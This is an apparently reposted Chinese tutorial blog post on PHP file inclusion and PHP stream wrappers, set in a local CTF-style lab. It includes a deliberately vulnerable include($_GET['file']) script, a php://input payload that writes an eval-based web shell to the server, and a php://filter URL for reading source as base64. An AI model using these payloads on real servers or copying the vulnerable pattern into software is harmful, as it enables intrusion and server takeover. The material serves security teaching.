文件包含与PHP伪协议实战演练

Posted 2022-11-26 墨子辰

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了文件包含与PHP伪协议实战演练相关的知识，希望对你有一定的参考价值。

一、php中造成文件包含的四个函数

1、include() 、require()
当使用include()函数包含文件时，只有代码执行到 include() 函数时才将文件包含进来，发生错误时只给出一个警告，继续向下执行。

当使用require()函数包含文件时，只要程序一执行就会立即调用文件,发生错误的时候会输出错误信息，并且终止脚本的运行

2、include_once() 功能和 include() 相同，区别在于当重复调用同一文件时，程序只调用一次。
require_once()功能和require()相同，区别在于当重复调用同一文件时，程序只调用一次。

当使用上述四个函数包含一个新文件时，该文件将作为 PHP 代码执行，php 内核并不在意该被包含的文件是什么类型。所以如果被包含的是 txt 文件、图片文件、远程 url、也都将作为 PHP 代码执行。

robots.txt 内容为：<?php phpinfo();?>
路径为：E:\\phpStudy\\WWW\\robots.txt

二、本地文件包含、远程文件包含的区别

1、本地文件包含 LFI(Local File Include)
2、远程文件包含 RFI(Remote File Include)（需要 php.ini 中 allow_url_include=on、allow_url_fopen = On）

在 php.ini 中，allow_url_fopen 默认一直是 On，而 allow_url_include 从 php5.2 之后就默认为 Off。

三、PHP伪协议

PHP伪协议事实上就是支持的协议与封装协议（12种）

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

测试代码

路径为：E:\\phpStudy\\WWW\\include.php

<?php
include($_GET[‘file‘])
?>

目标文件

robots.txt
路径为：E:\\phpStudy\\WWW\\robots.txt

<?php phpinfo();?>

robots.zip
路径为：E:\\phpStudy\\WWW\\robots.zip
内容为：robots.txt

1.php
路径为：E:\\phpStudy\\WWW\\1.php

<?php echo('hello word!');?>

flag.txt
路径为：E:\\flag.txt

flagtest123

常用协议

1、目录遍历获取flag

2、php://input、php://filter

在CTF中经常使用的是php://filter和php://input
（1）php://input用于执行php代码。

PHP.ini：
allow_url_fopen ：off/on
allow_url_include：on

也可以写入shell获取服务器权限

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

接下来就是连接后门就OK了

（2）php://filter用于读取源码
php://filter在双off的情况下也可以正常使用；
allow_url_fopen ：off/on
allow_url_include：off/on
?file=php://filter/convert.base64-encode/resource=1.php

获取到的内容是base64加密的，解码即可获取1.php源码